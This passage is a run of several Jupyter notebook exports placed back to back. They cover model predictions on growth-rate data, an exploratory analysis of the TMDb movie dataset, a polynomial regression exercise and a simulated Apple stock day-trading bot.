to use 2D Convolution layers for processing these data. (The paper does it in the same way.)The label has a single value, namely the growth rate, which is just a floating-point number.Now we can make a Sidekick Deployment object:client = sidekick.Deployment( url='', token='' )First check that this object works for predicting a single example before we move on to predicting all of them.client.predict(seq=X_test[0])It works, so now we can move on to getting predictions for all of the test examples.test_preds = client.predict_many([{'seq': x} for x in X_test])The `predict_many()` method will return a list of dictionaries containing predictions which looks something like this:```[{'growth_rate': array([0.72314715], dtype=float32)}, {'growth_rate': array([-1.3992405], dtype=float32)}, {'growth_rate': array([-1.3097613], dtype=float32)}, [...]]``` So we need to extract the numerical predictions from each of these dictionaries by accessing the key `growth_rate`:y_pred = [x['growth_rate'][0] for x in test_preds] y_pred[:10]Now we have a normal list of floating point numbers, so we can make a plot like the one in figure 2A of the paper.df = pd.DataFrame({'predicted': y_pred, 'actual': y_test.squeeze()})Scatter plotg = sb.jointplot(x="predicted", y="actual", data=df); g.fig.suptitle("R2={:.2}".format(explained_variance_score(y_test, y_pred)));/anaconda3/lib/python3.6/site-packages/scipy/stats/stats.py:1713: FutureWarning: Using a non-tuple sequence for multidimensional indexing is deprecated; use `arr[tuple(seq)]` instead of `arr[seq]`. In the future this will be interpreted as an array index, `arr[np.array(seq)]`, which will result either in an error or a different result. return np.add.reduce(sorted[indexer] * weights, axis=axis) / sumvalWith point densityThe plot above already gives something that looks like figure 2A in the paper. As we have a large number of data points (almost 25,000), it may also be helpful to see where most of the points are actually located.g = sb.jointplot(x="predicted", y="actual", data=df, kind="kde"); g.fig.suptitle("R2={:.2}".format(explained_variance_score(y_test, y_pred)));/anaconda3/lib/python3.6/site-packages/scipy/stats/stats.py:1713: FutureWarning: Using a non-tuple sequence for multidimensional indexing is deprecated; use `arr[tuple(seq)]` instead of `arr[seq]`. In the future this will be interpreted as an array index, `arr[np.array(seq)]`, which will result either in an error or a different result. return np.add.reduce(sorted[indexer] * weights, axis=axis) / sumvalProject: TMDb Movies Data Analysis Table of ContentsIntroductionData WranglingExploratory Data AnalysisConclusions Introduction In this project, I am going to analyze the TMDb Movie Dataset. The dataset, originally from kaggle, was cleaned and provided by Udacity as part of the Data Analsis Nanodegree Program. It's a collection of more than 5000 movies which includes plentiful data on the release year, genres, cast, directors, runtimes, budgets, revenues and production companies. The dataset covers movies with release dates from 1960 to 2015. First I am going to import necessary Python packages that are required to do the analysis. The packages imported are Pandas, Numpy, Matplotlib and Seaborn. Then I will gather, assess and clean the data (data wrangling). Next step is the Exploratory Data Analysis (EDA) to find patterns in the data and build intuition. Next, I will draw conclusions (in the summary section) with descriptive statistics. In the final step, I will communicate the results and justify my findings about the dataset with code results and visualizations. It is worth noting that these steps are how I worked on this project and you will see an intertwined combinations of several of these steps all through my data analysis process. In this project, I am going to find an answer to the following questions: 1 - Which movie genres are most popular from year to year? 2 - What are the 10 most popular movies between 1960 and 2015? 3 - What are the properties associated with high revenue movies? 4 - How have the anuual profitability of the movies changed over time? and what is the most contributing factor to the annual profittability? 5 - What is the average money made by each movie? 6 - Have the movies become shorter or longet over the years? The packages imported are Pandas, Numpy, Matplotlib and Seaborn. I also used the matplot inline to have my visulaizations plotted.import pandas as pd import numpy as np import matplotlib.pyplot as plt import seaborn as sns %matplotlib inlineData Wrangling General Propertiesdf_movies = pd.read_csv('tmdb-movies.csv') df_movies.head() df_movies.shapeThere are 10866 rows and 21 columns in our dataset. Since there are 21 columns in the dataset, let's take a look at the column headers to check for capitalization, long headers, typos, spaces, misspellings, etc. Looking at the column headers, it looks like the headers do not need any cleaning.df_movies.columns df_movies.describe()From the summary statistics, it's notable that I'm analyzing the movies that were released in the years 1960 to 2015, however, it looks like we don't have many movies that were released between 1960 to 1995 so the majority of the movies analyzed here ( 75%) were released after 1995. Also, there is zero budget or revenue reported for at least half of the movies. I am guessing that these movies might be independent films shot with little to no funding from a major film studio or a private investor. Another possibility could be that these movies were shot by a first time filmmaker or producer with very little to no experience. For more information on no budget films, please refer to the link below:**https://en.wikipedia.org/wiki/No-budget_film** Data Cleaningdf_movies.info() RangeIndex: 10866 entries, 0 to 10865 Data columns (total 21 columns): id 10866 non-null int64 imdb_id 10856 non-null object popularity 10866 non-null float64 budget 10866 non-null int64 revenue 10866 non-null int64 original_title 10866 non-null object cast 10790 non-null object homepage 2936 non-null object director 10822 non-null object tagline 8042 non-null object keywords 9373 non-null object overview 10862 non-null object runtime 10866 non-null int64 genres 10843 non-null object production_companies 9836 non-null object release_date 10866 non-null object vote_count 10866 non-null int64 vote_average 10866 non-null float64 release_year 10866 non-null int64 budget_adj 1[...]Now we want to see which features have *missing values*? Based on the data below, it looks like the missing values are random and there is no correlation among missing data. Moreover, the crucial headers containing information needed for data analysis (like revenue_adj, budget_adj, release_date, vote count and title) are not missing any values.df_movies.isnull().sum()According to the website [Imputation (statistics)] https://en.wikipedia.org/wiki/Imputation_(statistics), since the data are missing at random, then listwise deletion does not add any bias. I imputed the data by deleting the rows containg _missing values_:df_movies.dropna(inplace=True)We'll check again to make sure all null data are deleted. It should return False.df_movies.isnull().sum().any()Next, we check how many *duplicate rows* are in the movie dataset?sum(df_movies.duplicated())We can see that there's only 1 duplciate row in the dataset and we will drop that row, as shown below:df_movies.drop_duplicates(inplace = True)We check again for the duplicates to make sure we have dropped the duplicate:sum(df_movies.duplicated())It is time to check the data types and whether there are any problems with them.df_movies.dtypesNotice that the *release_date* are stored as strings (represented by object). We need to convert the *release_date* type datetime format. We can drop some columns that do not affect our data analysis to make our data look better and easier to handle. I decided to drop the following columns from the dataframe: 'imdb_id', 'keywords', 'overview', 'budget', 'revenue', 'homepage', 'tagline', 'release_date'df_movies.drop(['imdb_id', 'keywords','overview','keywords','overview','budget', 'revenue', 'homepage', 'tagline', 'release_date'], axis = 1, inplace = True) # Let's take a look at the data again to make sure there are no missing values nor there are incorrect data types. df_movies.info() Int64Index: 1992 entries, 0 to 10819 Data columns (total 13 columns): id 1992 non-null int64 popularity 1992 non-null float64 original_title 1992 non-null object cast 1992 non-null object director 1992 non-null object runtime 1992 non-null int64 genres 1992 non-null object production_companies 1992 non-null object vote_count 1992 non-null int64 vote_average 1992 non-null float64 release_year 1992 non-null int64 budget_adj 1992 non-null float64 revenue_adj 1992 non-null float64 dtypes: float64(4), int64(4), object(5) memory usage: 217.9+ KBOne more issue is that the genres and cast columns data are separated by pipe (|) characters. I will separate the genres data by | and put each unique genre into a new row.clean_movies = (df_movies.set_index(df_movies.columns.drop('genres',1).tolist()) .genres.str.split('|', expand=True) .stack() .reset_index() .rename(columns={0:'genres'}) .loc[:, df_movies.columns] ) clean_movies.head()in the IMDb version it was necessary to treat values of zero in the budget field as missing Exploratory Data Analysis> **Tip**: Now that you've trimmed and cleaned your data, you're ready to move on to exploration. Compute statistics and create visualizations with the goal of addressing the research questions that you posed in the Introduction section. It is recommended that you be systematic with your approach. Look at one variable at a time, and then follow it up by looking at relationships between variables.# I'm going to look at the plots of all the variables to get an overview of how they're correlated and their dependencies. pd.plotting.scatter_matrix(clean_movies, figsize = (16,16));C:\Users\zariped\Anaconda3\lib\site-packages\pandas\plotting\_tools.py:308: MatplotlibDeprecationWarning: The rowNum attribute was deprecated in Matplotlib 3.2 and will be removed two minor releases later. Use ax.get_subplotspec().rowspan.start instead. layout[ax.rowNum, ax.colNum] = ax.get_visible() C:\Users\zariped\Anaconda3\lib\site-packages\pandas\plotting\_tools.py:308: MatplotlibDeprecationWarning: The colNum attribute was deprecated in Matplotlib 3.2 and will be removed two minor releases later. Use ax.get_subplotspec().colspan.start instead. layout[ax.rowNum, ax.colNum] = ax.get_visible() C:\Users\zariped\Anaconda3\lib\site-packages\pandas\plotting\_tools.py:314: MatplotlibDeprecationWarning: The rowNum attribute was deprecated in Matplotlib 3.2 and will be removed two minor releases later. Use ax.get_subplotspec().rowspan.start instead. if not layout[ax.rowNum + 1, ax.colNum]: C:\Users\zariped\Anaconda3\lib\site-packages\pandas\plotting\_tools.py:314: MatplotlibDeprec[...]From the scatter matrix, it can be seen that there are several independant variables and several dependant variables. The independant variables are *runtime, budget_adj* and *id*. The dependant variables are *revenue_adj*.clean_movies.hist(figsize=(10,10));We can observe from the histograms of our data set, that the budget_adj, popularity, vote_count and runtime are all skewed to the right. Whereas release year and average vote are skewed to the left. These observatiosn indicate that only a small fraction of movies have high popularity, high budget and produce high revenues. It also shows that most of the movies in this dataset, were released after year 2000.#### Let's have a look at the budget histogram in more detail clean_movies['budget_adj'].hist() # We can see that the majority of movies have zero or low bugets, let's dig deeper into this. clean_movies['budget_adj'].describe()Research Question 1: Which movie genres are most popular from year to year?clean_movies['popularity'].describe() genres_popularity = clean_movies.groupby(['release_year','genres']).agg({'popularity': ['mean']}, inplace=True) genres_popularity.tail(25) genres_popularity = genres_popularity.reset_index() genres_popularity.head() genres_popularity.columns = genres_popularity.columns.get_level_values(0) genres_popularity.head() genres_popularity.describe() most_pop_genres = genres_popularity.query('popularity > 1.9') most_pop_genres.sort_values(['release_year', 'popularity'], ascending = False, inplace = True) most_pop_genres.head(20)C:\Users\zariped\Anaconda3\lib\site-packages\ipykernel_launcher.py:2: SettingWithCopyWarning: A value is trying to be set on a copy of a slice from a DataFrame See the caveats in the documentation: http://pandas.pydata.org/pandas-docs/stable/indexing.html#indexing-view-versus-copyAs seen in the table above, the popularity have changed a bit over the years for different genres, however, certain genres like *Action*, *Adventure* and *Science Fiction* have stayed quite popular all through the years. Another interesting observation is that the popularity of the movies have substantially increased over the final two years of data. We can investigate this further by evaluating the measure of popularity and the causes for this observation.pop_genres_2015 = most_pop_genres.query('release_year == 2015') pop_genres_2014 = most_pop_genres.query('release_year == 2014') pop_genres_2013 = most_pop_genres.query('release_year == 2013') fig, ax = plt.subplots(3, figsize = (14, 18), sharex = True) ax[0].barh(pop_genres_2013['genres'], pop_genres_2013['popularity'], color = 'b') ax[0].legend(['2013'], fontsize = 14) ax[1].barh(pop_genres_2014['genres'], pop_genres_2014['popularity'], color = 'm') ax[1].legend(['2014'], fontsize = 14) ax[2].barh(pop_genres_2015['genres'], pop_genres_2015['popularity'], color = 'g') ax[2].legend(['2015'], fontsize = 14) fig.suptitle("Most Popular Genres", fontsize = 18) fig.text(0.5, 0.06, 'Popularity', ha = 'center', fontsize = 18) fig.text(0.01, 0.5,'Genres', va = 'center', rotation = 'vertical', fontsize = 18) plt.subplots_adjust(wspace = 0.025, hspace = 0.025) plt.show()Looking at the plots above, confirms our findings about the genres popularity YoY. Research Question 2: What are the 10 most popular movies between 1960 and 2015?# Let's see what's the popularity for the most famous 2% of movies? clean_movies['popularity'].quantile(.98) most_popular = clean_movies.query('popularity > 6.887') most_popular_movies = most_popular.groupby(['original_title', 'popularity']).mean() most_popular_movies.sort_values('popularity', ascending=False).head(10)The 10 most popular movies between 1960 and 2015 are: *'Jurassic World', 'Mad Max: Fury Road', 'Interstellar', 'Guardians of the Galaxy', 'Insurgent', 'Captain America: The Winter Soldier', 'Star Wars', '', 'Star Wars: The Force Awakens' and 'The Hunger Games: Mockingjay - Part 1'*. Research Question 3: What kinds of properties are associated with movies that have high revenues?# Let's investigate the adjusted revenue column first: clean_movies['revenue_adj'].describe() # We will devide the revenue_adj column into categories. Bin edges that will be used to cut the data into groups are: bin_edges = [0, 3.56e+07, 1.74e+08, 2.83e+09] # Labels for the four acidity level groups bin_names = ['low', 'medium', 'high'] clean_movies['revenue_adj_levels'] = pd.cut(clean_movies['revenue_adj'], bin_edges, labels = bin_names) clean_movies.head() high_revenue_df = clean_movies.query('revenue_adj_levels == "high"') high_revenue_df.head() high_revenue_df.plot(x='budget_adj', y='revenue_adj', kind='scatter', figsize=(10,10)); plt.xlabel("Budget\n(2010 Dollars)", fontsize=14, labelpad=15) plt.ylabel("Revenue\n(2010 Dollars)", fontsize=14, labelpad=15) plt.title('Revenue vs Budget in High Revenue Films\n(2010 Dollars)', fontsize=16, y=1.04) plt.tick_params(labelsize=12) high_revenue_df.plot(x='vote_count', y='revenue_adj', kind='scatter', figsize=(10,10)) plt.xlabel("Vote Count", fontsize=14, labelpad=15) plt.ylabel("Revenue\n(2010 Dollars)", fontsize=14, labelpad=15) plt.title('Revenue vs Vote_count in High Revenue Films', fontsize=16, y=1.04) plt.tick_params(labelsize=12); high_revenue_df.plot(x='revenue_adj', y='popularity', kind='scatter', figsize=(10,10)); plt.title('Popularity vs Revenue in High Revenue Films', fontsize=16, y=1.04) plt.xlabel("Revenue\n(2010 Dollars)", fontsize=14, labelpad=15) plt.ylabel("Popularity", fontsize=14, labelpad=15) plt.tick_params(labelsize=12)According to the 3 scatter plots above, we can see that there's a positive and strong correlation between popularity, budget, vote count and high revenue which is what we expect in movie production. In a nutshell, for a movie to generate high revenues, production companies need to allocate more budget and spend more money on advertisement in order to increase the vote count and enhance revenue stream. However, we can also see some outliers in all three plots. For example, the "Popularity vs Revenue in High Revenue Films" scatter plot is indicating that some very high revenue films are not actually that popular. Also, several low budget movies have produced very high revenues. These outliers need to be investigated further and on a case by case basis to indentify other contributing factors to the observed outcomes. Research Question 4: How have the anuual profitability of the movies changed over time?# Let's calculate the adjusted profitability,(in 2010 dollars) for our dataset. clean_movies.insert(14,'profit_adj', clean_movies['revenue_adj']-clean_movies['budget_adj']) clean_movies.head(2) annual_profits_total = clean_movies.groupby('release_year')['profit_adj'].sum() plt.figure(figsize=(6,3), dpi = 130) # x-axis plt.xlabel('Release Year', fontsize = 10) # y-axis plt.ylabel('Profits earned by Movies\n(2010 Dollars)', fontsize = 10) #title of the line plot plt.title('Annual Profits of Movies vs Release Year\n(2010 Dollars)') #plotting the graph plt.plot(annual_profits_total) #displaying the line plot plt.show()The plot shows that the annular profits by movies were in somewhat of a flat trend from the 1960s to the year 2000. Starting year 2000, we can see an exponential increase in the profitability of the movies. Let's investigate whether the budget can be a contributing factor in this uptrend.annual_budget_total = clean_movies.groupby('release_year')['budget_adj'].sum() plt.figure(figsize=(6,3), dpi = 130) # x-axis plt.xlabel('Release Year', fontsize = 10) # y-axis plt.ylabel('Total Budget Spent on Movies \n(2010 Dollars)', fontsize = 10) #title of the line plot plt.title('Total Annual Budgets of Movies vs Release Year\n(2010 Dollars) ') #plotting the graph plt.plot(annual_budget_total) #displaying the line plot plt.show()We can see that the budget spent on the movies follows the same trend as the annual profits. Research Question 5: What is the average money made by each movie?average_revenue = clean_movies['profit_adj'].unique().mean() average_revenueThe average revenue for each movie is 118.1 Million Dollars. Research Question 6: Have the movies become shorter or longer over the years?clean_movies['runtime'].describe() # Looks like more than half of the movies have a duration between 90-120 minutes. Now let's look at the yearly fluctuations in movie duration. anual_average_movie_runtime = clean_movies.groupby('release_year')['runtime'].mean() anual_average_movie_runtime.tail(10) # Now we can take a look at the diagram of runtimes over the years to see if there's a pattern. plt.figure(figsize=(6,3), dpi = 130) # x-axis plt.xlabel('Release Year', fontsize = 10) # y-axis plt.ylabel('Length\n(Minutes)', fontsize = 10) #title of the line plot plt.title('Average Film Length, 1960-2015') #plotting the graph plt.plot(anual_average_movie_runtime, color = 'b') #displaying the line plot plt.show()Fit a Polynomialimport pandas as pd import matplotlib.pyplot as plt import numpy as np url = 'https://raw.githubusercontent.com/BolunDai0216/nyuMLSummerSchool/master/day03/polyfit_data.csv' df = pd.read_csv(url) x = df['x'].values y = df['y'].values plt.plot(x,y,'o') plt.xlabel('x') plt.ylabel('y') plt.show()Exercice :1) Compute the Design matrix :$ \begin{bmatrix} 1 & x_{1} & x_{1}^2 & \cdots & x_{1}^M \\ 1 & x_{2} & x_{2}^2 & \cdots & x_{2}^M \\ \vdots & & \ddots & & \vdots \\ 1 & x_{N} & x_{N}^2 & \cdots & x_{N}^M \end{bmatrix}$2) Compute the Least-Square solution : $\mathbf{w} = (X^TX)^{-1}X^TY$3) Compute the MSE4) Make a prediction for xplt = np.linspace(0, 5, 100) and plot your polynomial over the data points5) Try to find the "best" value for M# Choose any integer value for M M = 3 def design_matrix(x, M): x = x.reshape(-1,1) bias_col = np.ones((x.shape[0], 1)) PhiX = bias_col for i in np.arange(1, M+1): PhiX = np.hstack([PhiX, x**i]) return PhiX X = design_matrix(x, M) y = y.reshape(-1, 1) # w = np.linalg.inv(X.T @ X) @ X.T @ y w = np.linalg.pinv(X) @ y yhat = X @ w mse = np.mean((y-yhat)**2) print('Polynomial degree = {} '.format(M), 'mse = {}'.format(mse)) xplt = np.linspace(0, 5, 100) Xplt = design_matrix(xplt, M) yplt = Xplt @ w plt.plot(xplt, yplt,'b') plt.plot(x,y,'o')Polynomial degree = 3 mse = 0.0317958519811255Bonus :Reproduce your code with sklearn !from sklearn import linear_model X = design_matrix(x, M) # fitting the model reg = linear_model.LinearRegression(fit_intercept=False) reg.fit(X, y) w = reg.coef_ # training error yhat = reg.predict(X) mse = np.mean((y-yhat)**2) print('Polynomial degree = {} '.format(M), 'mse = {}'.format(mse)) yplt = reg.predict(design_matrix(xplt, M)) plt.plot(xplt, yplt,'b') plt.plot(x, y,'o')Polynomial degree = 3 mse = 0.031795851981125056Searching for the best Mdegrees = [1, 3, 5, 12, 20] fig, ax = plt.subplots(5, 1, figsize=(8,15)) xplt = np.linspace(x.min(), x.max(), 1000) for i in range(5): M = degrees[i] X = design_matrix(x, M) reg = linear_model.LinearRegression(fit_intercept=False) yhat = reg.fit(X, y) yhat = reg.predict(X) mse = np.mean((y-yhat)**2) yplt = reg.predict(design_matrix(xplt, M)) ax[i].plot(xplt, yplt,'b') ax[i].plot(x, y,'o') ax[i].set_title(f'Degree = {M} mse = {mse}') plt.tight_layout()Train/Testx = df['x'].values y = df['y'].values nsamp = x.shape[0] print(f'We have {nsamp} samples') inds = np.random.permutation(nsamp) ntrain = 12 ntest = 8 train_index = inds[:ntrain] test_index = inds[ntrain:] xtrain, ytrain = x[train_index], y[train_index] xtest, ytest = x[test_index], y[test_index] print(xtrain.shape) print(ytrain.shape) print(xtest.shape) print(ytest.shape) M = 10 Xtrain = design_matrix(xtrain, M) # fitting the model reg = linear_model.LinearRegression(fit_intercept=False) reg.fit(Xtrain, ytrain) yplt = reg.predict(design_matrix(xplt, M)) plt.plot(xplt, yplt,'b') plt.plot(xtrain,ytrain,'o',markeredgecolor='black') plt.plot(xtest,ytest,'o',markeredgecolor='black')1.0 Project Goal This project implements 2 of the 6 stock trading algorithm dicussed in the [Become a Day Trader Course by Investopedia](https://academy.investopedia.com/products/become-a-day-trader)The project consists of two parts: - First a python file that simulates trading Apple's stock during March 10, 2020 to April 3, 2020 using the trading algorithms from Investopedia's course- Second is this Jupyter Notebook that describes the methodology behind the trading bot, result of trading from previous step and future improvement 2.0 Project InspirationThis project was inspired by the stock market crash of March 2020 and intended to be used as a comprehensive system to trade stocks and make money.The bulls or people confident in the market lost a lot of money in March 2020 crash. However, the bears or the people betting against the market made a fortune. Within a few weeks, the market started its uptrend again and reached an all-time high within few months from nearly 50% down. The rapid decline and rise in the market provided a tremendous opportunity for profit and served as a very inspirational moment. Instead of making money only once, depending on whether I was a bull or bear, I wanted to make money all the time. Trading stocks is a losing game for most people: 90% of traders lose money, and only 10% make money consistently. From my research and experience in the stock market, some of the best predictors for success in trading are managing emotions, processing information quickly to see patterns before others, and executing fast. Thus, I embarked on a journey to create a trading bot that would be able to do all of this better than I ever could. This project looks at a relatively simple trading bot that will serve as the building block of a comprehensive trading system. This bot uses two out of 6 algorithms from Investopedia's day trading course. The other four algorithms were not precise, and I wanted a working bot released as quickly as possible for testing and optimization purposes. The bot trades Apple's stock only and also operates under an ideal condition, which simplified the buying and selling process of stocks. With all that said, let's see how the trading bot does with an initial balance of USD 10,000 3.0 Background into Stock Market and Day Trading 3.1 Investing vs. Day Trading and Short vs. Long PositionWhen buying a particular stock, knowledgable investors typically use a combination of the company's fundamentals, stock's price chart, and related news to determine whether to go long on a stock or short it.When an investor is confident that stock's price will increase, he buys the stock and profits when the stock's price rises. In trading terminologies, this is going on long on a stock. On the other hand, if an investor expects a stock's price to go down, he would short the stock. Shorting a stock means that he loans shares and sells it in the open market with the hope that he can buy and return the shares back to the owner at a lower price. There are other securities that traders can trade which are out of scope for this project.A trader typically holds a stock for a much shorter period than an investor. A day trader would close off his positions at the end of the business day. The rationale behind this is to help him mentally check out and start fresh the following day. Also, a day trader only looks at the stock's price chart to make trading decisions. This trading bot day trades. So all of the positions are closed at the end of the day, and only the stock's price chart is used to make trading decisions. 3.2 Different Type of OrdersFor simplification, the different types of orders when buying stocks using a broker will be explained from the perspective of an investor intending to go long on a stock.When buying shares, the buyer can specify a market order or limit order. A market order will instruct the broker's bot to purchase shares at the best current price; this price is usually very close or the same as the current stock's price shown by the broker. For a limit order, the buyer specifies what price he wishes to buy a specific number of shares; this price is called the limit price and is usually lower than the current stock's price.When selling shares, the buyer can specify a market order, limit order, or stop-loss order. Just like with buying shares, a market order will instruct the broker's bot to sell the specified number of shares asap at the best possible price. For a limit order, the buyer specifies what price he wishes to sell a specific number of shares; this price is called the limit price, and this price is typically equal to or above the stock's current price. For a stop-loss order, the seller specifies the stop-loss price which if the stock price hits, the bots are to sell a specified number of shares automatically at the limit price or higher; the limit price and stop-loss price could be the same; both are usually below the current stock price.For shorting a stock, buying would imply loaning shares and selling on the market, and selling would mean buying shares back from the open market to return to the owner. All the trade algorithms here utilizes market order when buying. For every purchase order, two other orders are specified for selling the position. The first order for selling is a limit sell order, and the second order is a stop-loss order. A profitable trade would be closed by a limit sell, and unprofitable trade would be closed by a stop-loss sell. For going long on a stock, the limit price for selling would be set higher than the purchase price, and the stop-loss price for selling would be set lower than the purchase price. For shorting a stock, the limit price for selling would be set lower than the purchase price, and the stop-loss price for selling would be set higher than the purchase price. 3.3 Explanation of Derived Numbers and Their PurposeThe following numbers are calculated from stock's data: SMA, EMA, RSISMA stands for simple moving average. When calculating SMA, the time unit and time interval need to be specified. For example, calculating SMA for a period of 9 and a time unit of minutes would involve taking the closing price of a stock for the last 9 minutes and taking the average. SMA9 could denote this average for short. EMA stands for exponential moving average. The idea to calculate EMA is similar to that of SMA, but EMA gives more weight to recent data, unlike SMA, which gives equal weight to all the data. The bot utilizes EMA and SMA over 9, 15, 65, and 200-minute intervals are designated by SMA9, SMA15, SMA65, SMA200 or EMA9, EMA15, EMA65, EMA200RSI stands for relative strength index. Mathematically, RSI looks at average gain vs. average loss over a specific period; 14 minutes in this case. RSI ranges from 0 to 100. RSI of 30 or below indicates that the stock is oversold while RSI of 70 or above shows an overbought condition. RSI should not be used on its own to sell or buy stocks as stocks can stay overbought or oversold for a long time.The use of these derived numbers will be explained below when discussing the trading algorithms 4.0 Trading Algorithms TheoryThe two trading algorithms the bot uses are Base Trade Algorithm and Far From Moving Average Trade Algorithm. The specific implementation of the trades can be studied from the code included in the repository. The basic theory of the algorithms are described below 4.1 Base Trade AlgorithmThe base trade algorithm first ensures that a stock is in a "Base"; the stock's price should appear virtually flat for a minimum of 30 minutes. More specifically, the price should fluctuate no more than 0.5% of the stock's price. As soon as the stock's price moves out of the 0.5% range in either direction, place a market order for going long or short. The stop loss price is equal to the lowest/highest price during the base. Depending on the stock's price, the limit sell price is specified to reach a profit target of \\$0.25-\\$1 per share. 4.2 Far From Moving Average Trade AlgorithmFar from moving average trade algorithm first ensures that the stock has diverted more than $1.50 from the closest EMA and RSI is =80. When the stock's price starts to break its upward or downward spiral, place a market order for going short or long. The stop-loss order is placed on the lowest/highest point of the spiral, and the limit sell order should be specified to reach a target of no more than \\$1 profit per share. 5.0 Methodology 5.1 Obtaining Data and Simulating Real-Time TradingAll the stock's price data is obtained as a table (really a DataFrame) using the [Yahoo Finance python package](https://pypi.org/project/yahoo-finance). Yahoo Finance python package gives historical data of a stock's price over a different period; I chose to use 1 minute period. The following table illustrates the format of the data:import numpy as np import pandas as pd import yfinance as yf test_data = yf.download (tickers = "AAPL", start= "2020-09-02", end = "2020-09-03", interval= "1m") test_data.head()[*********************100%***********************] 1 of 1 completedNote that for the purpose of the trading bot, data for the stock is shown at 1 minute intervalDatetime contains both date and time. The time part is formatted as *Current Time: 00-04:00*. 00-04:00 is 4 PM, which is when the North American stock market usually closes. Each row tells us what happened during a minute. For example, the first row is saying that between 9:30:00 AM to 9:30:59 AM, the stock's opening price was \\$137.59 (Open' column). During this minute, the stock's price reached a high of \\$137.98 ('High) and reached a low of \\$136 ('Low' Column). The stock's price at the end of the 30th minute of the day was \\$136:06 ('Close). During this minute, 11490492 shares changed hands ('Volume' column). Adj Close or Adjusted Close Price can be interpreted similarly to Closing price; it also factors in dividends, stock splits, new stock offerings. Usually 'Adj Close' and 'Close' price is the sameYahoo finance package does not give real-time data. It only provides historical price data. So, price data for April 16, 2020, can't be obtained until the end of April 16, 2020. In real-life, a bot could get live data minute by minute by calling the broker's API. To simulate this, this bot instead only receives one minute of data for each iteration of a central loop that encompasses the entire software. So, for a given day, in the first iteration of the loop, the bot would only have access to stock's price data to the end of 9:30 AM (market opens at 9:30 AM in North America). In the second iteration, the bot would have access to data until the end of 9:31 AM, and so on.Later on, DataFrame containing data similar to the data shown above, along with derived numbers such as SMA, EMA, and RSI, are used to aid in making trading decisions. 5.2 Constraints, Assumptions, and Overall Trading ProcessHere are initial conditions, constraints, and assumptions under which the bot operates- The starting capital is USD 10,000- The bot only trades Apple Stock (Ticker: AAPL)- The bot can only make one trade at a time- The maximum loss for a day is $100. - If both Base Trade Algorithm and Far From Moving Average trade signals are active at any minute, then base trade is given priority. This choice was made because the base trade algorithm theory is much more precise than the far from moving average trade algorithm- No trades are placed after 3:30 PM, and all the trades are closed by 3:50 PM. These limits are there to allow a trade setup to play out (the last possible trade in a day have 20 minutes to play out) and ensure that all positions are closed by the end of the dayThe overall program is executed as followed by the bot:1. Append one row of data to the DataFrame containing the stock's price data2. Calculate derived numbers (SMA, EMA, RSI) including the latest data3. Check if the base trade algorithm and or far from moving average generated a trading signal. 4. Check if there is an active trade. If there is an active trade, then check if the positions should be closed based on stop-loss price and limit sell price5. Act on the trading signal from Step 3 if the following conditions are satisfied: - No active trade - Current time is 3:30 PM or earlier - Maximum loss for the day won't be reached if the trade does not play out in our favor As noted before, all buy orders are market order, and for every purchase order, two sell orders: limit sell and stop-loss sell are also issued.6. Repeat Step 1-5As stated before, when acting on a trading signal, the bot gives priority to base trade signals over far from moving average trade signals. During buying, the bot records buying time, buying price, and the number of shares. In each trade, all available capital is used to purchase shares. The broker fee is assumed to be $1 during selling or buying as per[Interactive Brokers website](https://www.interactivebrokers.ca/en/index.php?f=45251&p=stocks1)The selling time of a position and profit/loss is also recorded in the appropriate row in the trade summary tableA stock's price is generally continuous. In real life, it seems that the stock's price is updated every second. However, the bot only has access to minute by minute data. Thus, at step 4, if there is an active trade and the bot detects that as per the latest data obtained in Step 1, the stock's price crossed either of the price threshold established by the limit and stop-loss sell, then it is assumed that the bot sold the position at the limit sell or stop-loss price. As an example, the bot receives data up to the end of 1:30 PM at 1:31 PM. With the help of the algorithms, the bot purchases the stock at 1:31 PM at \\$273.75 per share. The limit sell price is set at \\$274 per share. Within thirty seconds, the stock's price reached the price target of \\$274 per share. At 1:32 PM, the bot receives data up to the end of 1:31 PM. The bot sees that the stock's price closed at \\$275 at the end of 1:31 PM. Thus, we can assume that the broker's bot sold the shares at \\$274 per share due to the continuity assumption, and we achieved our profit target. This is a simplification of the selling process as alluded to before. 6.0 Result Analysis from the Trading BotThis section will analyze the data outputted by the trading bot as it simulated trading Apple's stock during March 10, 2020 to April 3, 2020The goal of the analysis will be first to see if the trading bot is profitable and second if can figure out some scenarios which are more profitable than othersimport datetime as dt import seaborn as sb import matplotlib.pyplot as plt6.1 Analysis of Profit and Loss Summary by Daysending_balance = pd.read_csv('BalanceChange30Days.csv', index_col = 0) ending_balanceThis DataFrame shows the ending balance at the end of each day. The starting balance was USD 10,000 as stated before.At the end of 19 business days, the trading bot lost about \$76.74. The result is a bit disappointing to see, especially considering that just two days before the end of the test run, it made a total profit of about \$56.76. Let's dive deeper into the losing and winning days. Some minor cleanup on the data is done in the process#reset index so starting index is 0 ending_balance.index = list(range(ending_balance.shape[0])) #Add in starting balance column for each day ending_balance['StartingBalance'] = pd.Series() ending_balance['StartingBalance'][1:] = ending_balance['EndingBalance'][:-1] ending_balance.loc[0,'StartingBalance']= 10000 #First starting balance is 10,000 #Calculate profit for each day ending_balance['Profit_Loss'] = ending_balance['EndingBalance'] - ending_balance['StartingBalance'] #label the ending and losing day to see distributoin of losses/profit for losing and winning days ending_balance['Profit_Loss_Label'] = pd.Series() ending_balance.loc [ending_balance['Profit_Loss']>=0, 'Profit_Loss_Label'] = 'Profit' ending_balance.loc [ending_balance['Profit_Loss']<0, 'Profit_Loss_Label'] = 'Loss' #Round off dollar amount to two decimal point for column in ['EndingBalance', 'StartingBalance', 'Profit_Loss']: ending_balance[column] = ending_balance[column].round(2) ending_balance.head() #Days when the bot broke even is counted as a winning day num_winning_days = (ending_balance['Profit_Loss']>=0).sum() num_losing_days = (ending_balance['Profit_Loss']<0).sum() print('Number of winning days are: {}'.format(num_winning_days)) print('Number of losing days are: {}'.format(num_losing_days)) #Create a temporary ending_balance DataFrame copy so we can use absolute value for losses/profit #This will make comparison easier temp_ending_balance = ending_balance.copy() temp_ending_balance['Profit_Loss'] = temp_ending_balance['Profit_Loss'].abs() sb.boxplot(x = 'Profit_Loss_Label', y = 'Profit_Loss', data = temp_ending_balance) plt.xlabel('Trade Classification') plt.ylabel('Profit/Loss') plt.title('Distribution of Profits and Losses by Days') #Statistics for winning days temp_ending_balance[temp_ending_balance['Profit_Loss_Label']=='Profit'].describe()['Profit_Loss'] #Statistics for losing days temp_ending_balance[temp_ending_balance['Profit_Loss_Label']=='Loss'].describe()['Profit_Loss']On average, the bot seems to be good at breaking even or making a profit since it broke even or made money in 11 days and lost money in 8 days.The box and whisker illustrate that during winning days, the profit is in a much narrower range 